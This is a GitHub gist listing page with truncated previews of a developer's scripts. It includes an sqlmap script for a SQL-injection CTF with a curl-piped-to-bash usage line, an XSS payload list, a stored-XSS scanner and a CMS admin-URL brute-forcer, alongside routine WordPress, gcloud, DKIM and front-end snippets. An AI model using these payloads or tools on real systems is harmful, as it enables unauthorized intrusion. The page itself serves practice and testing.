richardevcom
/ getFlag.sh
Last active
September 3, 2024 00:40
HackingHub - Capture flag in "Boolean Based SQL Injection" challange using SQLMap
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Challange: https://app.hackinghub.io/hubs/interactive-sqli-boolean | |
| #!/bin/bash | |
| apt update | |
| apt install -y sqlmap | |
| # Provide injectable URL for this script | |
| # URL="https://dc9zxy0y.eu2.ctfio.com/api/checkuser?username=adam" && curl -sL https://gist.githubusercontent.com/richardevcom/8ecfe76937db4d761bdb203d28c25ebc/raw | bash -s -- "$URL" | |
| URL=$1 |
richardevcom
/ wp-fix-permissions.sh
Last active
September 3, 2024 06:08
Fix & secure WordPress files & permissions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| chown -R www-data:www-data . | |
| find . -type d -exec chmod 755 {} \; | |
| find . -type f -exec chmod 644 {} \; | |
| chmod 440 .htaccess wp-config.php |
richardevcom
/ disable_all_gcloud_services.sh
Last active
July 17, 2024 23:13
Google Cloud CLI command to disable all enabled services.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Use --force to skip "usage" errors | |
| gcloud services disable --project <project_id> $(gcloud services list --enabled --project <project_id> --format="value(NAME)") |
richardevcom
/ add-opendkim-key.sh
Created
April 12, 2022 22:57
Create Signing Table, Key Table, Trusted Hosts File and test DKIM key.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Which domain? | |
| get_domain(){ | |
| printf "\n" | |
| read -p "Domain: " DOMAIN | |
| } | |
| # Is domain set? | |
| domain_is_set(){ |
richardevcom
/ xss-naughty-list.txt
Created
May 14, 2020 05:03
Naughty XSS list with most popular exploits.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script>alert(123)</script> | |
| <script>alert('123');</script> | |
| <img src=x onerror=alert(123) /> | |
| <svg><script>123<1>alert(123)</script> | |
| "><script>alert(123)</script> | |
| '><script>alert(123)</script> | |
| ><script>alert(123)</script> | |
| </script><script>alert(123)</script> | |
| < / script >< script >alert(123)< / script > | |
| onfocus=JaVaSCript:alert(123) autofocus |
richardevcom
/ scan-stored-xss.py
Created
May 14, 2020 04:59
Scan for Stored XSS vulnerabilities in multiple forms & inputs using exploit list
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import argparse | |
| import sys | |
| from bs4 import BeautifulSoup as bs | |
| from urllib.parse import urljoin | |
| """ Prepare arguments for script parse """ | |
| parser = argparse.ArgumentParser(description="Detect if target is vulnerable to XSS!?") | |
| parser.add_argument('-u', dest='url', type=str, help="Target URL") |
richardevcom
/ get_admin_url.py
Last active
January 27, 2020 08:19
Find Prestashop, WordPress or other CMS admin control panel URL with Python
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import itertools | |
| import string | |
| import urllib2 | |
| def guess_admin_url(url, prefix): | |
| adminurl = url + prefix | |
| chars = string.ascii_lowercase + string.digits | |
| attempts = 0 | |
| for password_length in range(1, 9): | |
| for guess in itertools.product(chars, repeat=password_length): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Enable SVG mime-type | |
| */ | |
| add_filter('upload_mimes', function($mimes){ | |
| $mimes['svg'] = 'image/svg+xml'; | |
| return $mimes; | |
| }); |
richardevcom
/ demo.css
Last active
January 27, 2020 08:20
Interactive particles canvas generated from image
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| body { | |
| background: #000000; | |
| } | |
| #dots { | |
| position: absolute; | |
| top: 50%; | |
| left: 50%; | |
| margin-top: -95px; | |
| margin-left: -375px; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var resizeTimer; | |
| var timeoutInterval = 100; // Timeout interval for resize timer | |
| window.onresize = function(event) { | |
| var status = document.getElementById("status"); | |
| // ON RESIZING | |
| status.innerHTML = "Resizing..."; | |
| clearTimeout(resizeTimer); |
NewerOlder